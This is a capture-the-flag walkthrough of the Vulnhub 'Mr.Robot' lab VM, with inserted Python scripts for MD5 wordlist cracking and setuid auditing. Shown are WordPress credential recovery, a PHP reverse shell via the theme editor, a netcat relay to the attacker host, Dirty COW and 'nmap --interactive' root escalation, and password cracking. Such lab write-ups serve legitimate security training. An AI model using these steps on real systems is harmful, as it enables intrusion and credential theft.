[Vulnhub] Mr.Robot - Walkthrough

VM Download page

Victim: 192.168.56.101  
Attacker: 192.168.56.102  

Recon

First a quick nmap scan:

root@kali:~/vulnerhub/mrrobot# nmap -sC -Pn 192.168.56.101

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-29 14:25 EDT  
Nmap scan report for whoismrrobot.com (192.168.56.101)  
Host is up (-0.052s latency).  
Not shown: 997 filtered ports  
PORT    STATE  SERVICE  
22/tcp  closed ssh  
80/tcp  open   http  
|_http-title: Site doesn't have a title (text/html).
443/tcp open   https  
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:C0:2C:86 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds  

Check out port 80:

It's an awesome web page that emulates the show.

I tried every command available there, but none of it yields useful info. (There are even several videos about Mr.R凸b凸t.)


Start to hunt the prey

Check out /robots.txt:

User-agent: *  
fsocity.dic  
key-1-of-3.txt  

key-1-of-3.txt holds the first flag:
073403c8a58a1f80d943455fb30724b9

fsocity.dic must be a wordlist, so let's feed it to dirb:

root@kali:~/vulnerhub/mrrobot# dirb http://192.168.56.101 fsocity.dic 

-----------------
DIRB v2.22  
By The Dark Raver  
-----------------

START_TIME: Tue Aug 29 16:00:38 2017  
URL_BASE: http://192.168.56.101/  
WORDLIST_FILES: fsocity.dic

-----------------

GENERATED WORDS: 11452                                                         

---- Scanning URL: http://192.168.56.101/ ----
==> DIRECTORY: http://192.168.56.101/images/                                   
==> DIRECTORY: http://192.168.56.101/css/                                      
==> DIRECTORY: http://192.168.56.101/image/                                    
+ http://192.168.56.101/license (CODE:200|SIZE:309)                            
==> DIRECTORY: http://192.168.56.101/feed/                                     
==> DIRECTORY: http://192.168.56.101/video/                                    
==> DIRECTORY: http://192.168.56.101/audio/                                    
==> DIRECTORY: http://192.168.56.101/admin/                                    
==> DIRECTORY: http://192.168.56.101/blog/                                     
==> DIRECTORY: http://192.168.56.101/Image/                                    
+ http://192.168.56.101/intro (CODE:200|SIZE:516314)                           
+ http://192.168.56.101/rss (CODE:301|SIZE:0)                                  
+ http://192.168.56.101/login (CODE:302|SIZE:0)                                
+ http://192.168.56.101/readme (CODE:200|SIZE:64)            

...
-----------------
END_TIME: Tue Aug 29 16:34:36 2017  
DOWNLOADED: 12185 - FOUND: 5  

Then I browsed all those links, checking the source code and the network traffic at the same time.

It turns out this is a WordPress (:D) blog. But wpscan with several combinations of parameters turned up nothing interesting.

So I kept checking all the URLs.
When checking /license, I saw a blank page except for the following line:

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?  

But if you scroll down or check the source code, you'll find a base64-encoded string:

do you want a password or something?  
ZWxsaW90OkVSMjgtMDY1Mgo=  
root@kali:~/vulnerhub/mrrobot# echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d  
elliot:ER28-0652  

Great, now we have a login credential.

BTW, I grepped the .dic for the password and found it in there:

root@kali:~/vulnerhub/mrrobot# grep ER28-0652 fsocity.dic  
ER28-0652  

And later on I realized that you might be able to find a URL like "......./author/elliot" (WordPress author archives leak usernames), after which you can just brute-force the login with hydra and that .dic.

But anyway, we are now logged in to WordPress.


Get a shell

I tried to zip php-reverse-shell.php, upload the zip as a plugin and activate it to catch the shell, but it didn't work.

Then the super Chao (also known as evilC) came by and gave a big hint: navigate to Appearance/Editor, click header.php or some other .php file on the right side, paste your PHP shell code into the content, click Update File, then browse the blog and enjoy your shell. It works!

$ id    
uid=1(daemon) gid=1(daemon) groups=1(daemon)  
$ w
 19:08:17 up  1:37,  0 users,  load average: 0.00, 0.01, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT  
$ uname -a
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux  
$ python -c "import pty;pty.spawn('/bin/bash');"
daemon@linux:/$  

Get robot privileges

daemon@linux:/home/robot$ ls -l  
total 8  
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5  
robot:c3fcd3d76192e4007dfb496cca67e13b  

We need robot or root privileges to read the second flag (the key is mode 0400, robot only), and there happens to be a world-readable password hash file right next to it in robot's home. "What a coincidence!" :D

root@kali:~/vulnerhub/mrrobot# john --format=raw-md5 pwd.hash --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8  
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])  
Press 'q' or Ctrl-C to abort, almost any other key for status  
abcdefghijklmnopqrstuvwxyz (?)  
1g 0:00:00:00 DONE (2017-08-29 16:49) 6.666g/s 269360p/s 269360c/s 269360C/s abygail..TERRELL  
Use the "--show" option to display all of the cracked passwords reliably  
Session completed  

Cool, now we have robot's password!
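What john is doing above, written out in plain Python as an added example (this is not code from the original post): parse the user:hash line, MD5 every candidate once, and look the digest up in the set of outstanding targets. The wordlist here is a constructed stand-in for rockyou.txt; point the script at the real file for the actual crack. Because it checks several hashes in one pass, the same script also answers the question at the end of the post, whether the three flags are MD5s of words from fsocity.dic or rockyou.txt.

```python
"""Raw-MD5 wordlist attack in plain Python (added example, not from the post).
Reads 'user:hexhash' lines like /home/robot/password.raw-md5 (or bare hashes)
and tries every wordlist candidate against all targets in a single pass.
"""
import hashlib
import sys

# Constructed mini wordlist standing in for rockyou.txt / fsocity.dic.
SAMPLE_WORDLIST = [
    "password", "fsociety", "ER28-0652", "mrrobot",
    "abcdefghijklmnopqrstuvwxyz",   # robot's actual password on this box
    "evilcorp",
]


def parse_hash_file(lines):
    """Map lowercase hex digest -> username (None for bare hashes).
    Accepts 'user:hash' (john's pwd.hash format) and bare 'hash' lines."""
    targets = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, digest = line.rpartition(":")
        digest = digest.lower()
        if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError("not a raw MD5 hex digest: %r" % line)
        targets[digest] = user if sep else None
    return targets


def crack_raw_md5(targets, words):
    """One pass over the wordlist: hash each candidate once and look it up in
    the set of outstanding targets. Returns {digest: plaintext} for every hit."""
    remaining = set(targets)
    found = {}
    for word in words:
        if not remaining:
            break                      # everything cracked, stop early
        word = word.rstrip("\r\n")
        if not word:
            continue
        digest = hashlib.md5(word.encode("utf-8", "surrogateescape")).hexdigest()
        if digest in remaining:
            found[digest] = word
            remaining.discard(digest)
    return found


def report(targets, found):
    """Render results like `john --show`: 'user:plaintext' (or 'hash:plaintext')."""
    lines = []
    for digest, user in sorted(targets.items()):
        label = user if user is not None else digest
        lines.append("%s:%s" % (label, found.get(digest, "<not cracked>")))
    return lines


if __name__ == "__main__":
    # usage: python crack.py pwd.hash [wordlist]   (no wordlist -> built-in sample)
    with open(sys.argv[1]) as fh:
        targets = parse_hash_file(fh)
    if len(sys.argv) > 2:
        # surrogateescape keeps non-UTF-8 rockyou lines intact round-trip
        with open(sys.argv[2], errors="surrogateescape") as fh:
            found = crack_raw_md5(targets, fh)
    else:
        found = crack_raw_md5(targets, SAMPLE_WORDLIST)
    print("\n".join(report(targets, found)))
```

Hashing each candidate once and doing a set lookup is what makes john fast on a list of hashes; it is also why rockyou.txt cracks this one instantly, since the alphabet string is near the top of every common wordlist.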

daemon@linux:/home/robot$ su robot  
Password: abcdefghijklmnopqrstuvwxyz  
robot@linux:~$ id  
uid=1002(robot) gid=1002(robot) groups=1002(robot)  
robot@linux:~$ cat key-2-of-3.txt  
822c73956184f694993bede3eb39f959  

Second flag: 822c73956184f694993bede3eb39f959


Finding my way to root

robot@linux:/home$ ls -l  
total 4  
drwxr-xr-x 2 root root 4096 Nov 13  2015 robot  
robot@linux:~$ cat /etc/passwd  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
libuuid:x:100:101::/var/lib/libuuid:  
syslog:x:101:104::/home/syslog:/bin/false  
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin  
ftp:x:103:106:ftp daemon,,,:/srv/ftp:/bin/false  
bitnamiftp:x:1000:1000::/opt/bitnami/apps:/bin/bitnami_ftp_false  
mysql:x:1001:1001::/home/mysql:  
varnish:x:999:999::/home/varnish:  
robot:x:1002:1002::/home/robot:  

Four accounts (syslog, mysql, varnish, robot) list a home directory under /home, but only robot's folder actually exists there, so I didn't give the others much thought.

robot@linux:/home$ netstat -nplt  
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)  
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  
tcp        0      0 127.0.0.1:21            0.0.0.0:*               LISTEN      -  
tcp        0      0 127.0.0.1:2812          0.0.0.0:*               LISTEN      -  
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -  
tcp6       0      0 :::443                  :::*                    LISTEN      -  
tcp6       0      0 :::80                   :::*                    LISTEN      -  

There are FTP, MySQL and an unknown service on port 2812, all bound to 127.0.0.1 only. Good.

robot@linux:/var$ ls  
backups  cache    lib  local  lock  log  mail  opt  run  spool  tmp  
robot@linux:/var$ cd mail  
robot@linux:/var/mail$ ls  
robot@linux:/var/mail$ cd ..  
robot@linux:/var$ cd backups/  
robot@linux:/var/backups$ ls  
apt.extended_states.0  group.bak    passwd.bak  
dpkg.status.0           gshadow.bak  shadow.bak  
robot@linux:/var/backups$ cat passwd.bak  
cat: passwd.bak: Permission denied  
robot@linux:/var/backups$ ls -la  
total 356  
drwxr-xr-x  2 root root     4096 Nov 13  2015 .  
drwxr-xr-x 11 root root     4096 Jun 24  2015 ..  
-rw-r--r--  1 root root     7194 Jun 24  2015 apt.extended_states.0
-rw-r--r--  1 root root   331144 Jun 24  2015 dpkg.status.0
-rw-------  1 root root      604 Nov 13  2015 group.bak
-rw-------  1 root shadow    496 Nov 13  2015 gshadow.bak
-rw-------  1 root root     1217 Nov 13  2015 passwd.bak
-rw-------  1 root shadow    885 Nov 13  2015 shadow.bak

Nothing interesting here.

robot@linux:/var/log$ find / -xdev -perm /6000 \( -user root -o -group root \) 2>/dev/null  
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/mail-touchlock
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/screen
/usr/bin/mail-unlock
/usr/bin/mail-lock
/usr/bin/chsh
/usr/bin/crontab
/usr/bin/chfn
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/expiry
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/ssh-agent
/usr/bin/wall
/usr/local/bin/nmap
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/declaration
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/ca-certificates
/usr/local/share/sgml
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/misc
/usr/local/share/sgml/entities
/usr/local/share/fonts
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/lib/python3.4
/usr/local/lib/python3.4/dist-packages
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
/var/local
/var/mail
/sbin/unix_chkpwd

Nothing interesting here either, except /usr/local/bin/nmap. (wtf? there is an nmap?) So I scanned myself with nmap (just for fun :D)
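The find above is close but noisy: `-perm /6000` without `-type f` also matches setgid directories, which is where /usr/local/share/xml, /var/mail and friends in that list come from. Below is an added Python equivalent (not code from the original post) that restricts the audit to regular files, prunes other filesystems like `-xdev`, and ships with a constructed temp-dir fixture so it can be tried offline; the paths and modes in that fixture are made up. On this box the one non-stock hit, /usr/local/bin/nmap, is an old setuid nmap 3.81 whose --interactive mode can run `!sh`: sh keeps the effective uid of 0, whereas bash resets euid to the real uid unless started with -p, which is why only sh gives a root shell.

```python
"""Audit setuid/setgid *files*, like `find / -xdev -type f -perm /6000`.
Added example, not from the original walkthrough. The post's command omitted
-type f, so setgid directories padded the list; only regular files can be
executed with their owner's (or group's) privileges.
"""
import os
import stat
import sys
import tempfile


def _on_device(path, dev):
    """True if path lives on filesystem dev (emulates find's -xdev)."""
    try:
        return os.lstat(path).st_dev == dev
    except OSError:
        return False


def find_setuid_setgid(root, one_filesystem=True):
    """Return sorted [(path, 'setuid'|'setgid'|'setuid+setgid')] for regular
    files under root with either bit set. Symlinks are never followed."""
    root_dev = os.lstat(root).st_dev
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if one_filesystem:
            # editing dirnames in place tells os.walk which subdirs to descend
            dirnames[:] = [d for d in dirnames
                           if _on_device(os.path.join(dirpath, d), root_dev)]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                       # vanished or unreadable entry
            if not stat.S_ISREG(st.st_mode):   # skips symlinks, sockets, fifos
                continue
            kinds = [k for bit, k in ((stat.S_ISUID, "setuid"),
                                      (stat.S_ISGID, "setgid")) if st.st_mode & bit]
            if kinds:
                hits.append((path, "+".join(kinds)))
    return sorted(hits)


def make_sample_tree():
    """Constructed fixture so the audit can run offline: one setuid binary, one
    setgid binary, one plain file and one setgid directory (the noise case)."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    files = {"bin/fakesu": 0o4755, "sbin/fakegpasswd": 0o2755, "etc/motd": 0o644}
    for rel, mode in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path))
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    mail = os.path.join(root, "var", "mail")
    os.makedirs(mail)
    os.chmod(mail, 0o2775)   # setgid dir: matched by -perm /6000, ignored here
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/"
    for path, kind in find_setuid_setgid(target):
        print("%-13s %s" % (kind, path))
```

Run it as `python suid_audit.py /` on the victim and compare against a stock Ubuntu 14.04 install; anything under /usr/local or /opt is the first place to look.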

robot@linux:/var$ nmap localhost  

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2017-08-29 19:22 UTC  
Interesting ports on localhost (127.0.0.1):  
(The 1658 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE  
21/tcp   open  ftp  
80/tcp   open  http  
443/tcp  open  https  
3306/tcp open  mysql  

But it turns out that was just my limited knowledge: I could have gotten root through this nmap. I'll talk about it at the end.

Back to my recon work.
I tried to connect to the FTP server but couldn't figure out the username. Then I found this:

robot@linux:/etc$ cat ftpusers  
# /etc/ftpusers: list of users disallowed FTP access. See ftpusers(5).

root  
daemon  
bin  
sys  
sync  
games  
man  
lp  
mail  
news  
uucp  
nobody  

And this:

robot@linux:/etc$ cat vsftpd.allowed_users  
bitnamiftp  

Alright, now we have a new target: bitnamiftp. Remember, this name also appeared in /etc/passwd.

I tried MySQL and got nothing there either.

Then I nc'd to port 2812 (because it appeared in the netstat output). It didn't say anything, so I guessed it might be a web server; I sent GET / HTTP/1.1, hit enter twice, and got some HTML back.

At this point I really wanted to see the content in a browser, because I saw 'mysql' and 'ftp' in the messy HTML.

So I built a temporary proxy (two proxies, actually).
On my Kali machine:

root@kali:~/vulnerhub/mrrobot# mknod backpipe p  
root@kali:~/vulnerhub/mrrobot# nc -l -k -p 9000 0<backpipe | nc -l -k -p 9001 | tee backpipe  

on the victim machine:

robot@linux:/tmp$ mknod backpipe p  
robot@linux:/tmp$ nc localhost 2812 0<backpipe | nc 192.168.56.102 9001 | tee backpipe  

Then I typed localhost:9000 into the browser on my Kali box and could browse it! But I had to rerun those two nc command lines every time I clicked a new link, because the server closes the connection after one exchange. Anyway.

It turns out this is a Monit Service Manager page.
I reran those two nc lines and browsed to apache.

Here, ammmmm, I thought I had found the name again: bitnamiftp, but it turns out it's not the username, which cost me a lot of time checking the /opt/bitnami/ directory.


Actual root

After all that work, I decided to use the dirty way to root it...
(actually I'd been holding this idea back since I saw uname -a reporting kernel 3.13.0.)

I tried overlayfs, which didn't work, then the 'super' Dirty COW exploit (cowroot), which worked!

robot@linux:/tmp$ ./cowroot  
DirtyCow root privilege escalation  
Backing up /usr/bin/passwd to /tmp/bak  
Size of binary: 47032  
Racing, this may take a while..  
thread stopped  
thread stopped  
/usr/bin/passwd overwritten
Popping root shell.  
Don't forget to restore /tmp/bak  
root@linux:/tmp# id  
uid=0(root) gid=1002(robot) groups=0(root),1002(robot)  
root@linux:/tmp# cd /root  
root@linux:/root# ls  
firstboot_done  key-3-of-3.txt  
root@linux:/root# cat key-3-of-3.txt  
04787ddef27c3dee1ee161b21670b4e4  

Third flag: 04787ddef27c3dee1ee161b21670b4e4
Great! Now I'm done. (Before logging off, put the original binary back as the exploit reminds you: cp /tmp/bak /usr/bin/passwd. Otherwise passwd stays broken on the box.)


nmap to root

If you type nmap --interactive, then !sh, you are root. (God damn it, how could I not know about this until this late! But thank god I know it now.)
I learned this from this video. Thanks a lot!
But if you type !bash, you won't get a shell, and I don't know why. If someone knows the reason, please leave a message and teach me about it.

flag ∈ hash?

After rooting the box, I checked other people's walkthroughs and someone said the flags might be MD5 hash strings, which I hadn't realized before.
So I tried to crack them with both fsocity.dic and rockyou.txt, and also on md5decrypt.net, but got nothing interesting, so I suppose they are just flags rather than hints.

Alright, thanks for watching!
Enjoy!